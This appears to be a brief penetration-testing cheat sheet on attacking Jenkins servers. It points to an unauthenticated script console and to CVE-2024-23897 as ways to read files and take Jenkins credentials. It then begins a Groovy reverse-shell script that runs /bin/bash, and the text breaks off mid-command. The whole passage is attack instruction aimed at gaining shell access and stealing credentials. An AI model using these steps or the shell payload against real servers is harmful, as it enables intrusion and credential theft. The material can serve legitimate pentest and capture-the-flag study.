Exploiting Jenkins / CVE-2024-23897

Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script

If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below)

Groovy scripts can be executed from the script console.

To get a reverse shell, execute the following script.

For Linux,

r =Runtime.getRuntime()

p =r.exec(["/bin/bash",...